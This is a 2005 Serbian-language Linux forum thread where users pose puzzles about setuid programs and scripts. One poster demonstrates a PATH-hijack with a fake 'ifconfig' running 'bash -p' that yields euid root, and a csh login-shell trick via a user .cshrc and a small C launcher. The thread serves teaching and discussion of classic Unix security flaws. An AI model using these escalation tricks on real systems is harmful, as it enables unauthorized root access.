Почетак › Форуми › Линукс › Опште Линукс дискусије › Suid bit i tekstualne datoteke
- This topic has 51 одговор, 9 гласова, and was last updated 18 years, 8 months раније by maddox.
-
АуторЧланци
-
1. децембар 2005. у 9:55 pm #37912japanУчесник
uh… predajem se… 😆
kako prevariti strcmp() ?
1. децембар 2005. у 10:19 pm #37913popeyeГлавни мајсторTražio si zeca u pogrešnom grmu. 😉
ifconfig:[code]#!/bin/bash -p
. /bin/bash -p[/code]
$ vi ifconfig
$ chmod 755 ifconfig
$ PATH=”.” ./a.out eth0
# id
uid=1000(popeye) gid=1000(popeye) euid=0(root)1. децембар 2005. у 10:27 pm #37914popeyeГлавни мајсторza ovo već nisam siguran, možda neki ” ili tako nešto…
Nije mi cilj bio da pričam o prelivanju bafera, to je malo duža (i komplikovanija za neupućene) tema. Ovo oko skripti, odnosno system() funkcije, je lakše za poimanje.
1. децембар 2005. у 10:44 pm #37915japanУчесникTražio si zeca u pogrešnom grmu. 😉
znao sam da je neka koska 😛
nije ni prelivanje bafera mnogo teško za shvatiti, samo je potrebno znati kako funkcioniše izvršavanje programa na nivou procesora… a to se uz dobru literaturu lako da naučiti…
1. децембар 2005. у 10:57 pm #37916popeyeГлавни мајсторMa stoji da je prosto, ali ni ovde se niko ne javlja. Pre nekog vremena je neko jednom tražio otvaranje foruma “Sigurnost” i tom prilikom sam odgovorio da za takvim forumom nema dovoljno korisnika koji bi učestvovali u nekoj normalnoj diskusiji. Danas sam malo zaludniji pa iskoristih ovu temu da vidim kako stoje stvari.
1. децембар 2005. у 11:10 pm #37917LimitManУчесникMene zanima … Mada stvarno nemam snage za vecu raspravu (neispavan, radio previse i sl…). Samo vas gledam i iskreno … saznajem neke nove stvari 😉 Mada je dosta tu i starih …
1. децембар 2005. у 11:14 pm #37918popeyeГлавни мајсторznao sam da je neka koska 😛
Hehe, ima puna korpa koski.
Šta misliš, u čemu je problem u ovoj skripti:
[code]#!/bin/csh
echo “Test!”[/code]
Pod pretpostavkom da je je vlasnik root, dozvole su 4755 i sistem poštuje suid bit na skripti, može li se dobiti root shell?
1. децембар 2005. у 11:24 pm #37919LimitManУчесникzaista ne vidim kako bi “Hello world” primer mogao da bude access to root preko suid-a …
Ako je to moguce … onda je sve moguce 😀
1. децембар 2005. у 11:45 pm #37920japanУчесникpomoslio sam da je dovoljno uraditi isto što i malopre, ali izgleda da nije…
2. децембар 2005. у 1:32 am #37921popeyeГлавни мајстор~/.cshrc:
[code]/bin/bash -p[/code]pokretac.c:
[code]#includeint main() {
execl(“test.sh”,”-“,0);
return 0;}
[/code]$ vi ~/.cshrc
$ vi pokretac.c
$ make pokretac
$ ./pokretac.c
$ ps
PID TTY TIME CMD
26292 pts/0 00:00:00 bash
26370 pts/0 00:00:00 test.sh
26371 pts/0 00:00:00 bash
26380 pts/0 00:00:00 psKao što vidiš, dve instance bash školjke su pokrenute. Izlaskom iz tako dobijenog shella, izvršava se test.sh (ispisuje se “Test!”). Kada bi sistem dozvolio suid za skriptu, ovo bi trebao biti root shell.
-
АуторЧланци
Мораш бити пријављен да би поставио коментар у овој теми.